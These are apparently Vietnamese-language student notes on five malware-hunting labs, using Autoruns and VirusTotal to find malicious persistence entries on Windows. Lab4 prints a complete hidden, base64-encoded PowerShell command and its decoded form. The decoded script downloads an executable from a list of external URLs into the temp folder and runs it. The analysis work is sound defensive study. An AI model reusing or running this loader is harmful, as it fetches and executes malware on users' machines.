Lab1-5 - HackMD

# Lab1 Rà soát mã độc bằng autoruns, có 2 entry chưa được verify. Jump đến image tại `C:\Users\hunter\AppData\Roaming\ELP84P\System~1.LNK (Not Verified)` ![image](https://hackmd.io/_uploads/Syk0o8YlA.png) shortcut gọi `System.exe -launcher`. Kiểm tra với virustotal: ![image](https://hackmd.io/_uploads/S1qGnIFg0.png) Kết luận đây là mã độc Với UnikeyNT, có vẻ legit. Tuy nhiên vẫn nên gỡ bỏ và sử dụng phần mềm được kí số. ![image](https://hackmd.io/_uploads/By9RlDYeR.png) # Lab2 ![image](https://hackmd.io/_uploads/r1AGSvKx0.png) Rà soát bằng autorun, tại các entry services có một entry là WinDefend chưa được verify. Tuy nhiên kiểm tra service windefender trên máy, thông báo lỗi là service đã dừng hoạt động. Có gì đó sai sai. Kiểm tra độ uy tín: ![image](https://hackmd.io/_uploads/ByrKHwtg0.png) ![image](https://hackmd.io/_uploads/r17pBPYx0.png) Kết luận đây là mã độc # lab3 Rà soát bằng autorun, phát hiện một entry khả nghi trong mục scheduler task: ![image](https://hackmd.io/_uploads/SkBDrFFe0.png) Kiểm tra với virustotal, đây thực chất là một PE file. ![image](https://hackmd.io/_uploads/SJFgUtKgA.png) Kết luận đây là mã độc. # lab4 Rà soát với autorun, phát hiện cmd được lập lịch với command sau: ![image](https://hackmd.io/_uploads/rk0W5KtxA.png) ```cmd! C:\Windows\system32\cmd.exe /C STARt /B powershell -NonInteractive -WindowStyle Hidden -e JABBAHUAagAwAHAAYgBtAD0AKAAnAE8AJwArACgAJwA2AGwAOQAnACsAJwAyAGYAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgB2ADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAGUAYwBUAG8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAcgBJAFQAYABZAHAAUgBPAFQAbwBDAE8AbAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAnACsAJwAxADIAJwArACgAJwAsACAAJwArACcAdAAnACsAJwBsAHMAMQAxACwAIAB0ACcAKQArACcAbABzACcAKQA7ACQATwBkAGQAeABxAGcAcAAgAD0AIAAoACcATwAxACcAKwAoACcAagAnACsAJwBwADAAagAnACkAKQA7ACQAUQBqAHkAXwBwAGkAagA9ACgAKAAnAFgAMwAnACsAJwA5AHMAJwApACsAKAAnADAAJwArACcAdgAyACcAKQApADsAJABIAGwAdAB0AGUAYwBjAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwB7ADAAfQB3ACcAKwAnAG8AcgBkAHsAMAAnACsAJwB9ADIAMAAnACsAJwAxADkAewAwACcAKwAnAH0AJwApACAAIAAtAGYAIABbAGMAaABhAFIAXQA5ADIAKQArACQATwBkAGQAeABxAGcAcAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEYAMAA1AF8AawAzAGUAPQAoACcASwBiACcAKwAnAGMAJwArACgAJwBiACcAKwAnADEAOQBfACcAKQApADsAJABXAGsAZQB0ADEAcwA0AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAGUAbgB0ADsAJABTAG0AeQB0AHQAbAA3AD0AKAAoACcAaAAnACsAJwB0AHQAcABzADoAJwApACsAKAAnAC8ALwBkAGEAZAAnACsAJwBpAGUAcgAnACsAJwBvACcAKwAnAHEAdQBlAC4AYwBvAG0AJwApACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGEAJwArACgAJwBkAG0AaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAGQAJwArACcAZwAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAcwA6ACcAKwAnAC8ALwAnACkAKwAnAHMAJwArACgAJwB1AGwAJwArACcAcwBlACcAKQArACgAJwBsACcAKwAnAGUAJwArACcAawAnACsAJwBzAHAAcgBlAHMALgBjAG8AbQAvAGMAZwBpAC0AJwArACcAYgBpACcAKQArACgAJwBuAC8AJwArACcANgBsACcAKQArACcAMABuACcAKwAoACcAeQAnACsAJwBPAC8AKgBoAHQAJwArACcAdAAnACkAKwAoACcAcABzACcAKwAnADoALwAnACsAJwAvAG0AJwApACsAJwBhACcAKwAoACcAdQAnACsAJwBsAGEAbgAnACkAKwAoACcAYQByACcAKwAnAHUAJwApACsAKAAnAG0AJwArACcAaQBmAG8AdQBuAGQAJwArACcAYQB0AGkAbwBuACcAKwAnAC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AUgAnACsAJwB1AG0AaQBGACcAKwAnAG8AdQBuACcAKwAnAGQAYQAnACkAKwAoACcAdABpACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcALwBRADkAZQB0AEYAJwApACsAJwAvACoAJwArACgAJwBoAHQAdABwACcAKwAnAHMAJwApACsAKAAnADoALwAvAGsAZQBsACcAKwAnAGEAcwAuAHkAZQAnACsAJwBjAC4AJwApACsAKAAnAGMAJwArACcAbwAuAGkAZAAnACkAKwAoACcALwBzACcAKwAnAHIAJwApACsAJwBqAG4AJwArACgAJwBzAC8AQgAvACoAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwBjAGEAJwArACcAZQBzACcAKwAnAGEAJwArACcAcgBtAG8AJwApACsAJwB2AGkAJwArACcAbgBnACcAKwAnAC4AJwArACcAYwBvACcAKwAoACcAbQAnACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuAHQAJwArACcALwAnACkAKwAnADkAJwArACcAcwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AawBpACcAKwAnAG4AZQBwAHIAJwArACcAZQBtAGkAbgAnACsAJwBzACcAKQArACgAJwAuAGMAJwArACcAbAAvAHcAJwApACsAKAAnAHAAJwArACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwA2AHcAcgAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACsAJwBkAG8AJwApACsAJwBsACcAKwAoACcAcABoACcAKwAnAGkAJwApACsAKAAnAG4AaQBuACcAKwAnAHMAaQBnACcAKwAnAGgAdAAnACsAJwAuACcAKwAnAGkAdAAvAHcAcAAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAJwApACsAJwBkACcAKwAnAGUAJwArACgAJwBzACcAKwAnAC8ATABWACcAKQArACcAZgAvACcAKQAuACIAUwBQAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABUAGcAeAB6ADIAYwA5AD0AKAAoACcASAAnACsAJwAyAG8AZgAnACkAKwAoACcANAAnACsAJwB4AGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABDAGcAYwB0AHQANgAxACAAaQBuACAAJABTAG0AeQB0AHQAbAA3ACkAewB0AHIAeQB7ACQAVwBrAGUAdAAxAHMANAAuACIAZABgAE8AVwBuAGwAYABvAGEARABgAEYAaQBMAEUAIgAoACQAQwBnAGMAdAB0ADYAMQAsACAAJABIAGwAdAB0AGUAYwBjACkAOwAkAFYAMgBhAHIAZgBrAGUAPQAoACcARAAnACsAKAAnAG8AdgAnACsAJwBuAGYAaABvACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAbAB0AHQAZQBjAGMAKQAuACIAbABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADkAOAA1ADAAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAoACQASABsAHQAdABlAGMAYwApADsAJABUADIANAAwAGMAaQBnAD0AKAAnAEkAJwArACgAJwB6ACcAKwAnAHUAbwAnACkAKwAoACcAMAAnACsAJwByADMAJwApACkAOwBiAHIAZQBhAGsAOwAkAFEAaQAwADgAdABiAHIAPQAoACgAJwBUAHUAJwArACcAbgAnACkAKwAnAHIAJwArACgAJwB1AG4AJwArACcAZAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwBuAGMAOABsAHMAMwA9ACgAJwBXAHEAJwArACgAJwA1AHcAdQByACcAKwAnAGcAJwApACkA ``` Sau khi decode thì payload powershell như sau: ```ps! $Auj0pbm=('O'+('6l9'+'2fc')); &('new-it'+'em') $ENv:Temp\WORD\2019\ -itemtype DirecToRY; [Net.ServicePointManager]::"sE`CUrIT`YpROToCOl" = ('tl'+'s'+'12'+(', '+'t'+'ls11, t')+'ls'); $Oddxqgp = ('O1'+('j'+'p0j')); $Qjy_pij=(('X3'+'9s')+('0'+'v2')); $Hlttecc=$env:temp+(('{0}w'+'ord{0'+'}20'+'19{0'+'}') -f [chaR]92)+$Oddxqgp+('.'+('ex'+'e')); $F05_k3e=('Kb'+'c'+('b'+'19_')); $Wket1s4=&('new'+'-ob'+'ject') neT.WEbcLIent; $Smyttl7=(('h'+'ttps:')+('//dad'+'ier'+'o'+'que.com')+'/'+'wp'+'-a'+('dmi'+'n')+'/'+('d'+'g'+'/*ht')+('tps:'+'//')+'s'+('ul'+'se')+('l'+'e'+'k'+'spres.com/cgi-'+'bi')+('n/'+'6l')+'0n'+('y'+'O/*ht'+'t')+('ps'+':/'+'/m')+'a'+('u'+'lan')+('ar'+'u')+('m'+'ifound'+'ation'+'.c')+'o'+('m/R'+'umiF'+'oun'+'da')+('ti'+'o')+('n'+'/Q9etF')+'/*'+('http'+'s')+('://kel'+'as.ye'+'c.')+('c'+'o.id')+('/s'+'r')+'jn'+('s/B/*'+'h'+'ttp://ca'+'es'+'a'+'rmo')+'vi'+'ng'+'.'+'co'+('m'+'/w'+'p-'+'content'+'/')+'9'+'s/'+('*htt'+'ps:'+'//ki'+'nepr'+'emin'+'s')+('.c'+'l/w')+('p'+'-adm'+'i'+'n/6wr/'+'*'+'http://'+'do')+'l'+('ph'+'i')+('nin'+'sig'+'ht'+'.'+'it/wp-i')+('nc'+'lu')+'d'+'e'+('s'+'/LV')+'f/')."SPl`It"([char]42); $Tgxz2c9=(('H'+'2of')+('4'+'xd')); foreach($Cgctt61 in $Smyttl7){ try{ $Wket1s4."d`OWnl`oaD`FiLE"($Cgctt61, $Hlttecc); $V2arfke=('D'+('ov'+'nfho')); If ((&('Ge'+'t-Ite'+'m') $Hlttecc)."le`NGtH" -ge 39850) { .('Invoke'+'-It'+'em')($Hlttecc); $T240cig=('I'+('z'+'uo')+('0'+'r3')); break; $Qi08tbr=(('Tu'+'n')+'r'+('un'+'d')) } }catch{} } $Knc8ls3=('Wq'+('5wur'+'g')) ``` Sử dụng công cụ PSDecode: ![image](https://hackmd.io/_uploads/ryatQ9tg0.png) Kiểm tra website dùng để tải file về với virustotal ![image](https://hackmd.io/_uploads/Hy537sFx0.png) # lab5 Rà soát bằng autorun, phát hiện một registry đc set, sử dụng cmd để excute "OIS.EXE". Các tham số sử dụng cho chương trình này giống với chương trình mimikatz dùng để dump password login. File được lưu trong system32, không phải đường dẫn thông thường của OIS legit. ![image](https://hackmd.io/_uploads/rkTYYoFlC.png) ![image](https://hackmd.io/_uploads/HJXiKjKlC.png)